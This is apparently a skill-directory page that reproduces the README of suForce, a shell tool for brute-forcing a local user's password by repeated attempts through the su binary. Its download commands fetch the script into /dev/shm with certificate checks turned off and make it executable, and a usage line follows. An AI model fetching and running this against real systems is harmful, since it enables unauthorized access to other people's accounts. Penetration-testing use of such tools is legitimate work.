SkillAgentSearch skills...

SuForce

Obtain a user's system password, this tool uses the su binary to perform a brute force attack until a successful collision occurs.

Install / Use

/learn @d4t4s3c/SuForce

README

suForce

GitHub stars GitHub forks GitHub watchers</br> GitHub commit activity (branch) GitHub contributors

Overview

If you have a username and want to try to obtain their password, suForce will make authentication attempts against that user from the [su] binary, performing a brute force attack until a successful collision occurs.

Download

cd /dev/shm
wget --no-check-certificate -q "https://raw.githubusercontent.com/d4t4s3c/suForce/refs/heads/main/suForce"
chmod +x suForce

Usage

./suForce -u <USER> -w <WORDLIST>

Related Skills

View on GitHub
GitHub Stars52
CategoryDevelopment
Updated4mo ago
Forks16

Languages

Shell

Security Score

97/100

Audited on Nov 30, 2025

No findings